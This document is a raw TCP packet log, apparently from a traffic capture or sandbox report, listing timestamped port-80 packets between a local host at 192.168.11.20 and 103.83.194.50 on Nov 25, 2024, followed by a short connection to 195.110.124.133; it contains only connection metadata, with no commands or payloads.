                                                                                Nov 25, 2024 11:56:56.311764002 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311774015 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311817884 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311861992 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311871052 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311906099 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311919928 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311949968 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312017918 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312042952 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312062979 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312105894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312150002 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312160969 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312194109 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312237024 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312278032 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312280893 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312278032 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312325954 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312330961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312330961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312370062 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312411070 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312439919 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312439919 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312453985 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312515020 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312541008 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312544107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312583923 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312594891 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312628031 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312640905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312673092 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312694073 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312694073 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312716007 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312757969 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312799931 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312841892 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312885046 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312889099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312889099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312927008 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.312956095 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.312998056 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.313043118 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.313052893 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313054085 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313054085 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.313215017 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484469891 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484529018 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484575033 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484622002 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.484755039 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484755993 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.484828949 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485034943 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485105038 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485152006 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485198021 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485207081 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485265970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485318899 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485361099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485364914 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485361099 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485408068 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485454082 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485496998 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485507011 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485507011 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485541105 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485574961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485583067 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485627890 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485652924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485652924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485671043 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485706091 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485716105 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485759020 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485802889 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485817909 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485817909 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485846043 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485889912 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485932112 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485959053 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.485975981 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486020088 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486032963 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486032963 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486063004 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486105919 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486149073 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486154079 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486191988 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486213923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486238003 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486258984 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486279964 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486314058 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486314058 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486324072 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486366034 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486409903 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486452103 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486481905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486495972 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486540079 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486542940 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486582041 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486624956 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486635923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486668110 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486692905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486711025 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486754894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486789942 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486797094 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486841917 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486851931 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486885071 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486927986 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486969948 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.486982107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.486982107 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487011909 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487035036 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487035036 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487056017 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487098932 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487128019 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487140894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487184048 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487189054 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487189054 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487226009 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487231970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487231970 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487232924 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487271070 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487313986 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487329960 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487355947 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487377882 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487399101 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487442017 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487464905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487464905 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487483978 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487519026 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487529039 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487565041 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487572908 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487616062 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487656116 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487658978 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487703085 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487716913 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487716913 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487746954 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487790108 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487832069 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487840891 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487874985 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487886906 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487886906 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487919092 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.487938881 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487938881 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.487992048 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488042116 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488085032 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488085985 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488085985 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488126993 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488137960 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488169909 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488214016 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488239050 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488240004 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488255024 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488297939 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488341093 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488346100 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488346100 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488382101 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488426924 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.488445044 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.488564014 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656017065 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656090975 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656140089 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656183004 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656225920 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656236887 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656270027 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656303883 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656303883 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656315088 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656359911 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.656362057 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656362057 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656409025 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656511068 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.656555891 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.661248922 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.661309004 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.661355972 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.661398888 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.661595106 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.662617922 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662678957 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662723064 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662767887 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662810087 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662853003 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662866116 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.662895918 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662914038 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.662914038 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.662940979 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.662964106 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.662983894 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663029909 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663053989 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663053989 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663072109 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663115025 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663155079 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663156033 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663157940 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663203001 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663203955 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663247108 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663290977 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663299084 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663299084 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663337946 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663345098 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663393974 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663414955 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663470984 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663494110 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663515091 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663558960 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663589001 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663602114 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663645029 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663686991 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663691044 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663729906 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663737059 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663773060 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663785934 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663815975 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663861036 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663870096 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.663904905 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663949966 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.663980961 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664005041 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664050102 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664053917 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664053917 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664096117 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664139986 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664150953 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664182901 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664201975 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664227009 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664268970 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664294004 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664311886 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664350986 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664357901 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664401054 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664403915 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664450884 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664453983 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664453983 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664522886 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664575100 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664596081 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664618969 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664661884 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664693117 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664705038 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664747953 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664756060 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664791107 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664834023 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664855003 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664855957 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664877892 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664922953 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.664952993 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.664964914 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665002108 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665008068 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665050983 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665052891 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665096998 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665141106 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665148020 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665183067 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665225983 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665247917 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665270090 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665313959 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665327072 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665355921 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665399075 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665442944 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665474892 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.665487051 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665519953 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.665709019 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:57:01.489758015 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:57:01.489983082 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:57:17.099428892 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:57:26.394829988 CET4974280192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 11:57:26.585932016 CET8049742195.110.124.133192.168.11.20
